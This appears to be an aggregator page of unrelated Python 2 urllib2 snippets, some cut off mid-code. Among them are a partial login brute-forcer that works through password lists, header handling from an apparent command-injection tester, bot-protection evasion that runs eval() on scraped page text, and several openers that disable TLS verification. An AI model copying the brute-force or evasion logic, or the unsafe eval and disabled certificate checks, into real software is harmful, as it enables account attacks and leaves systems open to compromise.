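A usage sketch for the compatibility shim above, assuming a PYTHON_3 flag derived from sys.version_info (the excerpt implies such a flag but does not show it):

import sys

PYTHON_3 = sys.version_info[0] == 3
if PYTHON_3:
    import urllib.request
else:
    import urllib2

opener = build_opener()  # resolves to the right stdlib on both Python 2 and 3
print(opener.open('http://example.com').read()[:80])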
Example #48
0
    def dataGenerator(self, allFileIndices, queries, currentPath):
        final_directory = os.path.join(currentPath, r'theData')
        if not os.path.exists(final_directory):
            os.makedirs(final_directory)

        allSubDirectories = []
        for query in queries:
            subDirectory = os.path.join(final_directory, query)
            if not os.path.exists(subDirectory):
                os.makedirs(subDirectory)
            allSubDirectories.append(subDirectory)

        allDocWordCount = []

        for i in range(0, len(queries)):
            cnt = 0
            docWordCount = []
            for theUrl in allFileIndices[i]:
                if cnt < 60:
                    try:
                        ctx = ssl.create_default_context()
                        ctx.check_hostname = False
                        ctx.verify_mode = ssl.CERT_NONE
                        opener = urllib2.build_opener(
                            urllib2.HTTPSHandler(context=ctx))
                        opener.addheaders = [('Referer', theUrl)]
                        html = opener.open(theUrl, timeout=10).read()
                        soup = BeautifulSoup(html, "lxml")

                        textTemp = list()
                        try:
                            textTemp.append(soup.find('title').text)
                            textTemp.append('\n')
                            # Other tag lists were also tried here: 'li', 'ul', 'span'.
                            for theText in soup.find_all(['p'], text=True):
                                textTemp.append(theText.text)
                        except:
                            print theUrl
                            pass

                        text = " ".join(textTemp)
                        lines = (line.strip() for line in text.splitlines())
                        chunks = (phrase.strip() for line in lines
                                  for phrase in line.split("  "))
                        text = '\n'.join(chunk for chunk in chunks if chunk)
                        text = text.encode('utf8')
                        if len(text.split(' ')) >= 50:
                            docWordCount.append(len(text.split(' ')))
                            tmpFile = str(cnt) + ".txt"
                            indexFile = open(
                                allSubDirectories[i] + "/" + tmpFile, "w")
                            indexFile.write(text)
                            indexFile.close()
                            cnt = cnt + 1
                    except:
                        pass
            allDocWordCount.append(docWordCount)

        with open(currentPath + '/' + 'allDocWordCount.pkl', 'wb') as f2:
            pickle.dump(allDocWordCount, f2)
        return allDocWordCount
Example #49
0
if (len(username) > 0 and len(password) > 0):
    mode = 1  # single username, single password
elif (len(username) > 0 and len(passFile) > 0):
    mode = 2  # single username, password list
elif (len(userFile) > 0 and len(password) > 0):
    mode = 3  # username list, single password
elif (len(userFile) > 0 and len(passFile) > 0):
    mode = 4  # username list, password list

#
#init opener
#
cookieJar = cookielib.CookieJar()
cookieHandler = urllib2.HTTPCookieProcessor(cookieJar)
if useProxy == 0:
    opener = urllib2.build_opener(cookieHandler)
else:
    opener = urllib2.build_opener(proxyHandler,cookieHandler)
opener.addheaders = [('User-agent', agent)]
cookieJar.clear()
cookieJar.clear_session_cookies()

#
#main
#
try:
    response = opener.open(url)
    content = response.read()
    if mode == 1:
        values = {'log' : username,
                      'pwd' : password,
Example #50
0
    def login(self, openurl):
        cj = cookielib.CookieJar()
        opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
        opener.open(__scraper__.loginurl, self.loginData)
        link = opener.open(openurl).read()
        return link
Example #51
0
# -*- coding: utf-8 -*-

import urllib2

# Build an HTTPHandler processor object that handles HTTP requests.
# debuglevel=1 automatically turns on debug logging.
http_handler = urllib2.HTTPHandler(debuglevel=1)

# Use build_opener() to construct a custom opener.
opener = urllib2.build_opener(http_handler)

url = 'http://www.baidu.com'
req = urllib2.Request(url)
res = opener.open(req)
content = res.read()
#print(content)
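
A small extension of the snippet above (my addition, not part of the original): urllib2.HTTPSHandler accepts the same debuglevel argument, so TLS traffic can be traced as well:

import urllib2

# Trace request/response lines for both plain and TLS connections.
opener = urllib2.build_opener(
    urllib2.HTTPHandler(debuglevel=1),
    urllib2.HTTPSHandler(debuglevel=1))
res = opener.open('http://www.baidu.com')
content = res.read()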
Example #52
0
 def __init__(self,
              api_path,
              username="",
              password="",
              use_auth=True,
              auth_type="basic",
              consumer_key=None,
              consumer_secret=None,
              oauth_token=None,
              oauth_token_secret=None,
              validate_ssl=True,
              save_oauth_credentials=None):
     import base64
     self.api_path = api_path
     if self.api_path[-1] == "/":
         # We don't want a surplus / when creating request URLs. Sure, most
         # servers will handle it well, but why take the chance?
         self.api_path = self.api_path[:-1]
     if domain_regex.findall(self.api_path)[0][2] == "api.twitter.com":
         self.is_twitter = True
     else:
         self.is_twitter = False
     if validate_ssl:
         #TODO: Implement SSL-validating handler and add it to opener here
         self.opener = urllib2.build_opener()
     else:
         self.opener = urllib2.build_opener()
     self.use_auth = use_auth
     self.auth_type = auth_type
     self.oauth_token = oauth_token
     self.oauth_token_secret = oauth_token_secret
     self.save_oauth_credentials = save_oauth_credentials
     self.auth_string = None
     if not self.__checkconn():
         raise Exception("Couldn't access %s, it may well be down." %
                         (api_path))
     if self.use_auth:
         if auth_type == "basic":
             self.auth_string = base64.encodestring(
                 '%s:%s' % (username, password))[:-1]
             if self.is_twitter:
                 raise Exception(
                     "Twitter does not support basic auth; bailing out.")
             if not self.account_verify_credentials():
                 raise Exception("Invalid credentials")
         elif auth_type == "oauth":
             if has_oauth:
                 self.consumer = oauth.OAuthConsumer(
                     str(consumer_key), str(consumer_secret))
                 self.oauth_initialize()
                 if self.is_twitter:
                     self.api_path += "/1"
                 if not self.account_verify_credentials():
                     raise Exception("OAuth authentication failed")
             else:
                 raise Exception("OAuth could not be initialised.")
         self.server_config = self.statusnet_config()
         try:
             self.length_limit = int(
                 self.server_config["site"]
                 ["textlimit"])  # this will be 0 on unlimited instances
         except:
             self.length_limit = 0  # assume unlimited on failure to get a defined limit
         self.tz = self.server_config["site"]["timezone"]
Example #53
0
        fp = TCPFile(data)
        if data:
            headers = {
                'Content-type': 'application/octet-stream',
                'Content-length': len(data),
            }
            code = 200
        else:
            headers = {}
            code = 404

        return urllib.addinfourl(fp, headers, req.get_full_url(), code=code)


urllib2.install_opener(urllib2.build_opener(TCPReaderHandler()))


class DnsCommandClientDecodingError(Exception):
    pass


__DEBUG = 0

if __DEBUG:
    import dns.resolver
    resolver = dns.resolver.Resolver()
    resolver.nameservers = ['127.0.0.1']
    resolver.port = 5454
    socket.gethostbyname_ex = lambda x: (
        None, None, [str(rdata) for rdata in resolver.query(x, 'A')])
Example #54
0
    user_config = {}

    try:
        execfile(filename, user_config)
    except SyntaxError, e:
        sys.stderr.write('Syntax error in config file: %s\n'
                         'Line %i offset %i\n' %
                         (filename, e.lineno, e.offset))
        sys.exit(1)

    auth_handler = urllib2.HTTPBasicAuthHandler()
    auth_handler.add_password(realm='Web API',
                              uri=RBWEBSITE_API_URL,
                              user=user_config['USERNAME'],
                              passwd=user_config['PASSWORD'])
    opener = urllib2.build_opener(auth_handler)
    urllib2.install_opener(opener)


def execute(cmdline):
    if isinstance(cmdline, list):
        print(">>> %s" % subprocess.list2cmdline(cmdline))
    else:
        print(">>> %s" % cmdline)

    p = subprocess.Popen(cmdline, shell=True, stdout=subprocess.PIPE)

    s = ''

    for data in p.stdout.readlines():
        s += data
Example #55
0
    def send_http(self, messages, channel='default'):
        import urllib2, json, time, cookielib
        print_error("send_http", messages)

        if self.proxy:
            import socks
            socks.setdefaultproxy(
                proxy_modes.index(self.proxy["mode"]) + 1, self.proxy["host"],
                int(self.proxy["port"]))
            socks.wrapmodule(urllib2)

        cj = cookielib.CookieJar()
        opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
        urllib2.install_opener(opener)

        t1 = time.time()

        data = []
        for m in messages:
            method, params = m
            if type(params) != type([]): params = [params]
            data.append({
                'method': method,
                'id': self.message_id,
                'params': params
            })
            self.unanswered_requests[self.message_id] = method, params, channel
            self.message_id += 1

        if data:
            data_json = json.dumps(data)
        else:
            # poll with GET
            data_json = None

        headers = {'content-type': 'application/json'}
        if self.session_id:
            headers['cookie'] = 'SESSION=%s' % self.session_id

        try:
            req = urllib2.Request(self.connection_msg, data_json, headers)
            response_stream = urllib2.urlopen(req, timeout=DEFAULT_TIMEOUT)
        except:
            return

        for index, cookie in enumerate(cj):
            if cookie.name == 'SESSION':
                self.session_id = cookie.value

        response = response_stream.read()
        self.bytes_received += len(response)
        if response:
            response = json.loads(response)
            if type(response) is not type([]):
                self.queue_json_response(response)
            else:
                for item in response:
                    self.queue_json_response(item)

        if response:
            self.poll_interval = 1
        else:
            if self.poll_interval < 15:
                self.poll_interval += 1
        #print self.poll_interval, response

        self.rtime = time.time() - t1
        self.is_connected = True
Example #56
0
def do_check(request):

    # Check if a Host HTTP header is defined.
    if menu.options.host and settings.HOST_INJECTION == None:
        request.add_header('Host', menu.options.host)

    # Check if a User-Agent HTTP header is defined.
    if menu.options.agent:
        request.add_header('User-Agent', menu.options.agent)

    # Check if a Referer HTTP header is defined.
    if menu.options.referer and settings.REFERER_INJECTION == None:
        request.add_header('Referer', menu.options.referer)

    # Check if a Cookie HTTP header is defined.
    if menu.options.cookie and settings.COOKIE_INJECTION == False:
        request.add_header('Cookie', menu.options.cookie)

    # Check if any HTTP authentication credentials are defined.
    # HTTP Authentication: Basic / Digest Access Authentication.
    if not menu.options.ignore_401:
        if menu.options.auth_cred and menu.options.auth_type:
            try:
                settings.SUPPORTED_HTTP_AUTH_TYPES.index(
                    menu.options.auth_type)
                if menu.options.auth_type == "basic":
                    b64_string = base64.encodestring(
                        menu.options.auth_cred).replace('\n', '')
                    request.add_header("Authorization",
                                       "Basic " + b64_string + "")
                elif menu.options.auth_type == "digest":
                    try:
                        url = menu.options.url
                        try:
                            response = urllib2.urlopen(url)
                        except urllib2.HTTPError, e:
                            try:
                                authline = e.headers.get(
                                    'www-authenticate', '')
                                authobj = re.match('''(\w*)\s+realm=(.*),''',
                                                   authline).groups()
                                realm = authobj[1].split(',')[0].replace(
                                    "\"", "")
                                user_pass_pair = menu.options.auth_cred.split(
                                    ":")
                                username = user_pass_pair[0]
                                password = user_pass_pair[1]
                                authhandler = urllib2.HTTPDigestAuthHandler()
                                authhandler.add_password(
                                    realm, url, username, password)
                                opener = urllib2.build_opener(authhandler)
                                urllib2.install_opener(opener)
                                result = urllib2.urlopen(url)
                            except AttributeError:
                                pass
                    except urllib2.HTTPError, e:
                        pass
            except ValueError:
                err_msg = "Unsupported / Invalid HTTP authentication type '" + menu.options.auth_type + "'."
                err_msg += " Try basic or digest HTTP authentication type."
                print settings.print_critical_msg(err_msg)
                sys.exit(0)
        else:
            pass

    # The MIME media type for JSON.
    if settings.IS_JSON:
        request.add_header("Content-Type", "application/json")

    # Check if any extra HTTP headers are defined.
    if menu.options.headers or menu.options.header:
        # Do replacement with the 'INJECT_HERE' tag, if the wildcard char is provided.
        if menu.options.headers:
            menu.options.headers = checks.wildcard_character(
                menu.options.headers)
            extra_headers = menu.options.headers
        else:
            menu.options.header = checks.wildcard_character(
                menu.options.header)
            extra_headers = menu.options.header

        extra_headers = extra_headers.replace(":", ": ")
        if ": //" in extra_headers:
            extra_headers = extra_headers.replace(": //", "://")

        if "\\n" in extra_headers:
            extra_headers = extra_headers.split("\\n")
            # Remove empty strings
            extra_headers = [x for x in extra_headers if x]
            if menu.options.header and not menu.options.headers and len(
                    extra_headers) > 1:
                warn_msg = "Switching '--header' to '--headers' "
                warn_msg += "due to multiple extra HTTP headers."
                print settings.print_warning_msg(warn_msg)

        else:
            tmp_extra_header = []
            tmp_extra_header.append(extra_headers)
            extra_headers = tmp_extra_header

        for extra_header in extra_headers:
            # Extra HTTP Header name
            http_header_name = re.findall(r"(.*): ", extra_header)
            http_header_name = ''.join(http_header_name).strip()
            # Extra HTTP Header value
            http_header_value = re.findall(r":(.*)", extra_header)
            http_header_value = ''.join(http_header_value).strip()
            # Check if it is a custom header injection.
            if settings.CUSTOM_HEADER_INJECTION == False and \
               settings.INJECT_TAG in http_header_value:
                settings.CUSTOM_HEADER_INJECTION = True
                settings.CUSTOM_HEADER_NAME = http_header_name
            request.add_header(http_header_name, http_header_value)
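
For orientation, a minimal sketch of how do_check() is driven (the target URL and surrounding calls are invented for illustration; in the real tool they come from menu.options):

request = urllib2.Request('http://target.example/vuln.php?id=1')
do_check(request)  # applies Host / User-Agent / Referer / Cookie / auth / extra headers
response = urllib2.urlopen(request)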
Example #57
0
def request(url, close=True, error=False, proxy=None, post=None, headers=None, mobile=False, safe=False, referer=None, cookie=None, output='', timeout='30'):
    try:
        handlers = []
        if not proxy == None:
            handlers += [urllib2.ProxyHandler({'http': '%s' % (proxy)}), urllib2.HTTPHandler]
            opener = urllib2.build_opener(*handlers)
            urllib2.install_opener(opener)  # install_opener returns None; don't rebind opener
        if output == 'cookie' or not close == True:
            import cookielib
            cookies = cookielib.LWPCookieJar()
            handlers += [urllib2.HTTPHandler(), urllib2.HTTPSHandler(), urllib2.HTTPCookieProcessor(cookies)]
            opener = urllib2.build_opener(*handlers)
            urllib2.install_opener(opener)
        try:
            if sys.version_info < (2, 7, 9): raise Exception()
            import ssl; ssl_context = ssl.create_default_context()
            ssl_context.check_hostname = False
            ssl_context.verify_mode = ssl.CERT_NONE
            handlers += [urllib2.HTTPSHandler(context=ssl_context)]
            opener = urllib2.build_opener(*handlers)
            urllib2.install_opener(opener)
        except:
            pass

        if headers is None:
            headers = {}
        if 'User-Agent' in headers:
            pass
        elif not mobile == True:
            #headers['User-Agent'] = agent()
            headers['User-Agent'] = cache.get(randomagent, 1)
        else:
            headers['User-Agent'] = 'Apple-iPhone/701.341'
        if 'referer' in headers:
            pass
        elif referer == None:
            headers['referer'] = '%s://%s/' % (urlparse.urlparse(url).scheme, urlparse.urlparse(url).netloc)
        else:
            headers['referer'] = referer
        if not 'Accept-Language' in headers:
            headers['Accept-Language'] = 'en-US'
        if 'cookie' in headers:
            pass
        elif not cookie == None:
            headers['cookie'] = cookie

        request = urllib2.Request(url, data=post, headers=headers)

        try:
            response = urllib2.urlopen(request, timeout=int(timeout))
        except urllib2.HTTPError as response:
            if error == False: return

        if output == 'cookie':
            result = []
            for c in cookies: result.append('%s=%s' % (c.name, c.value))
            result = "; ".join(result)
        elif output == 'response':
            if safe == True:
                result = (str(response.code), response.read(224 * 1024))
            else:
                result = (str(response.code), response.read())
        elif output == 'chunk':
            content = int(response.headers['Content-Length'])
            if content < (2048 * 1024): return
            result = response.read(16 * 1024)
        elif output == 'geturl':
            result = response.geturl()
        else:
            if safe == True:
                result = response.read(224 * 1024)
            else:
                result = response.read()
        if close == True:
            response.close()

        return result
    except:
        return
Example #58
0
#!/usr/bin/env python
# -*- coding:utf-8 -*-

import urllib2

# Proxy switch: whether to enable the proxy.
proxyswitch = 0

# Build a ProxyHandler object; the argument is a dict mapping the proxy type to the proxy server IP+port.
httpproxy_handler = urllib2.ProxyHandler({"http": "218.106.98.166:53281"})

# Build a handler object that uses no proxy.
nullproxy_handler = urllib2.ProxyHandler({})

if proxyswitch:
    opener = urllib2.build_opener(httpproxy_handler)
else:
    opener = urllib2.build_opener(nullproxy_handler)

# Install a global opener; afterwards all requests sent via urlopen() also get the handler's behavior.
urllib2.install_opener(opener)

request = urllib2.Request("http://www.baidu.com/")
response = urllib2.urlopen(request)

#print response.read().decode("gbk")
print response.read()
Example #59
0
    def billionuploads(self, url):
        try:
            cookie_file = os.path.join(cookiepath, 'billionuploads.lwp')

            cj = cookielib.LWPCookieJar()
            if os.path.exists(cookie_file):
                try:
                    cj.load(cookie_file, True)
                except:
                    cj.save(cookie_file, True)
            else:
                cj.save(cookie_file, True)

            normal = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
            headers = [
                ('User-Agent',
                 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0'
                 ),
                ('Accept',
                 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
                 ), ('Accept-Language', 'en-US,en;q=0.5'),
                ('Accept-Encoding', ''), ('DNT', '1'),
                ('Connection', 'keep-alive'), ('Pragma', 'no-cache'),
                ('Cache-Control', 'no-cache')
            ]
            normal.addheaders = headers

            class NoRedirection(urllib2.HTTPErrorProcessor):
                # Stop Urllib2 from bypassing the 503 page.
                def http_response(self, request, response):
                    code, msg, hdrs = response.code, response.msg, response.info(
                    )
                    return response

                https_response = http_response

            opener = urllib2.build_opener(NoRedirection,
                                          urllib2.HTTPCookieProcessor(cj))
            opener.addheaders = normal.addheaders
            response = opener.open(url).read()
            decoded = re.search('(?i)var z="";var b="([^"]+?)"', response)
            if decoded:
                decoded = decoded.group(1)
                z = []
                for i in range(len(decoded) / 2):
                    z.append(int(decoded[i * 2:i * 2 + 2], 16))
                decoded = ''.join(map(unichr, z))
                incapurl = re.search(
                    '(?i)"GET","(/_Incapsula_Resource[^"]+?)"', decoded)
                if incapurl:
                    incapurl = 'http://billionuploads.com' + incapurl.group(1)
                    opener.open(incapurl)
                    cj.save(cookie_file, True)
                    response = opener.open(url).read()

            captcha = re.search(
                '(?i)<iframe src="(/_Incapsula_Resource[^"]+?)"', response)
            if captcha:
                captcha = 'http://billionuploads.com' + captcha.group(1)
                opener.addheaders.append(('Referer', url))
                response = opener.open(captcha).read()
                formurl = 'http://billionuploads.com' + re.search(
                    '(?i)<form action="(/_Incapsula_Resource[^"]+?)"',
                    response).group(1)
                resource = re.search('(?i)src=" (/_Incapsula_Resource[^"]+?)"',
                                     response)
                if resource:
                    import random
                    resourceurl = 'http://billionuploads.com' + resource.group(
                        1) + str(random.random())
                    opener.open(resourceurl)
                recaptcha = re.search(
                    '(?i)<script type="text/javascript" src="(https://www.google.com/recaptcha/api[^"]+?)"',
                    response)
                if recaptcha:
                    response = opener.open(recaptcha.group(1)).read()
                    challenge = re.search('''(?i)challenge : '([^']+?)',''',
                                          response)
                    if challenge:
                        challenge = challenge.group(1)
                        captchaimg = 'https://www.google.com/recaptcha/api/image?c=' + challenge
                        img = xbmcgui.ControlImage(450, 15, 400, 130,
                                                   captchaimg)
                        wdlg = xbmcgui.WindowDialog()
                        wdlg.addControl(img)
                        wdlg.show()

                        xbmc.sleep(3000)

                        kb = xbmc.Keyboard(
                            '', 'Please enter the text in the image', False)
                        kb.doModal()
                        capcode = kb.getText()
                        if (kb.isConfirmed()):
                            userInput = kb.getText()
                            if userInput != '': capcode = kb.getText()
                            elif userInput == '':
                                logerror(
                                    'BillionUploads - Image-Text not entered')
                                xbmc.executebuiltin(
                                    "XBMC.Notification(Image-Text not entered.,BillionUploads,2000)"
                                )
                                return None
                        else:
                            return None
                        wdlg.close()
                        captchadata = {}
                        captchadata['recaptcha_challenge_field'] = challenge
                        captchadata['recaptcha_response_field'] = capcode
                        opener.addheaders = headers
                        opener.addheaders.append(('Referer', captcha))
                        resultcaptcha = opener.open(
                            formurl, urllib.urlencode(captchadata)).info()
                        opener.addheaders = headers
                        response = opener.open(url).read()

            ga = re.search('(?i)"text/javascript" src="(/ga[^"]+?)"', response)
            if ga:
                jsurl = 'http://billionuploads.com' + ga.group(1)
                p = "p=%7B%22appName%22%3A%22Netscape%22%2C%22platform%22%3A%22Win32%22%2C%22cookies%22%3A1%2C%22syslang%22%3A%22en-US%22"
                p += "%2C%22userlang%22%3A%22en-US%22%2C%22cpu%22%3A%22WindowsNT6.1%3BWOW64%22%2C%22productSub%22%3A%2220100101%22%7D"
                opener.open(jsurl, p)
                response = opener.open(url).read()

    #         pid = re.search('(?i)PID=([^"]+?)"', response)
    #         if pid:
    #             normal.addheaders += [('Cookie','D_UID='+pid.group(1)+';')]
    #             opener.addheaders = normal.addheaders
            if re.search('(?i)url=/distil_r_drop.html', response) and filename:
                url += '/' + filename
                response = normal.open(url).read()
            jschl = re.compile('name="jschl_vc" value="(.+?)"/>').findall(
                response)
            if jschl:
                jschl = jschl[0]
                maths = re.compile('value = (.+?);').findall(
                    response)[0].replace('(', '').replace(')', '')
                domain_url = re.compile('(https?://.+?/)').findall(url)[0]
                domain = re.compile('https?://(.+?)/').findall(domain_url)[0]
                final = normal.open(
                    domain_url +
                    'cdn-cgi/l/chk_jschl?jschl_vc=%s&jschl_answer=%s' %
                    (jschl, eval(maths) + len(domain))).read()
                html = normal.open(url).read()
            else:
                html = response

            data = {}
            r = re.findall(r'type="hidden" name="(.+?)" value="(.*?)">', html)
            for name, value in r:
                data[name] = value

            captchaimg = re.search(
                '<img src="((?:http://|www\.)?BillionUploads.com/captchas/.+?)"',
                html)
            if captchaimg:

                img = xbmcgui.ControlImage(550, 15, 240, 100,
                                           captchaimg.group(1))
                wdlg = xbmcgui.WindowDialog()
                wdlg.addControl(img)
                wdlg.show()

                kb = xbmc.Keyboard('', 'Please enter the text in the image',
                                   False)
                kb.doModal()
                capcode = kb.getText()
                if (kb.isConfirmed()):
                    userInput = kb.getText()
                    if userInput != '': capcode = kb.getText()
                    elif userInput == '':
                        showpopup(
                            'BillionUploads',
                            '[B]You must enter the text from the image to access video[/B]',
                            5000, elogo)
                        return None
                else:
                    return None
                wdlg.close()

                data.update({'code': capcode})

            data.update({'submit_btn': ''})
            enc_input = re.compile('decodeURIComponent\("(.+?)"\)').findall(
                html)
            if enc_input:
                dec_input = urllib2.unquote(enc_input[0])
                r = re.findall(r'type="hidden" name="(.+?)" value="(.*?)">',
                               dec_input)
                for name, value in r:
                    data[name] = value
            extradata = re.compile(
                "append\(\$\(document.createElement\('input'\)\).attr\('type','hidden'\).attr\('name','(.*?)'\).val\((.*?)\)"
            ).findall(html)
            if extradata:
                for attr, val in extradata:
                    if 'source="self"' in val:
                        val = re.compile(
                            '<textarea[^>]*?source="self"[^>]*?>([^<]*?)<'
                        ).findall(html)[0]
                    data[attr] = val.strip("'")
            r = re.findall("""'input\[name="([^"]+?)"\]'\)\.remove\(\)""",
                           html)

            for name in r:
                del data[name]

            normal.addheaders.append(('Referer', url))
            html = normal.open(url, urllib.urlencode(data)).read()
            cj.save(cookie_file, True)

            def custom_range(start, end, step):
                while start <= end:
                    yield start
                    start += step

            def checkwmv(e):
                s = ""
                i = []
                u = [[65, 91], [97, 123], [48, 58], [43, 44], [47, 48]]
                for z in range(0, len(u)):
                    for n in range(u[z][0], u[z][1]):
                        i.append(chr(n))
                t = {}
                for n in range(0, 64):
                    t[i[n]] = n
                for n in custom_range(0, len(e), 72):
                    a = 0
                    h = e[n:n + 72]
                    c = 0
                    for l in range(0, len(h)):
                        f = t.get(h[l], 'undefined')
                        if f == 'undefined': continue
                        a = (a << 6) + f
                        c = c + 6
                        while c >= 8:
                            c = c - 8
                            s = s + chr((a >> c) % 256)
                return s

            dll = re.compile(
                '<input type="hidden" id="dl" value="(.+?)">').findall(html)
            if dll:
                dl = dll[0].split('GvaZu')[1]
                dl = checkwmv(dl)
                dl = checkwmv(dl)
            else:
                alt = re.compile('<source src="([^"]+?)"').findall(html)
                if alt:
                    dl = alt[0]
                else:
                    raise Exception('Unable to resolve - No Video File Found')

            return dl

        except Exception, e:
            raise
Example #60
0
    if ('all' in uri and cookieExists('ALL', cookies) is False) or ('malware' in uri and cookieExists('MALWARE', cookies) is False) :
        # Since we do not have a cursor use the reset uri
        uri = config['resetUri']
# If cookie file is not on disk and you are not
# calling the test feed use the reset call to obtain cookie
elif 'test' not in uri:
    uri = config['resetUri']

# Create HTTP handlers
handlers = [
    urllib2.HTTPHandler(),
    urllib2.HTTPSHandler(),
    urllib2.HTTPCookieProcessor(cookies)
    ]
# Build URL opener object and pass handlers
opener = urllib2.build_opener(*handlers)

# Function that makes the request to API
def fetch(uri):
    req = urllib2.Request(uri)
    req.add_header('Authorization', 'Basic %s' % base64string)
    req.add_header('Accept', 'application/json')
    return opener.open(req)
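
A short usage sketch for fetch() (config and base64string are built in earlier, unshown lines of this example; the key name resetUri appears above):

response = fetch(config['resetUri'])
print response.getcode()  # 200 on success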

# Function that saves the response to a file and saves cookies to file
def saveFiles(response, cookieFile, logFile):
    # Create a filename; if no path is included, the file is saved in the
    # same directory as the script.
    # (The format is day_month_year-24hour_minute_second_Microsecond; format
    # details: https://docs.python.org/2/library/datetime.html#strftime-strptime-behavior)
    filename = logFile
    # Save the Json response as a variable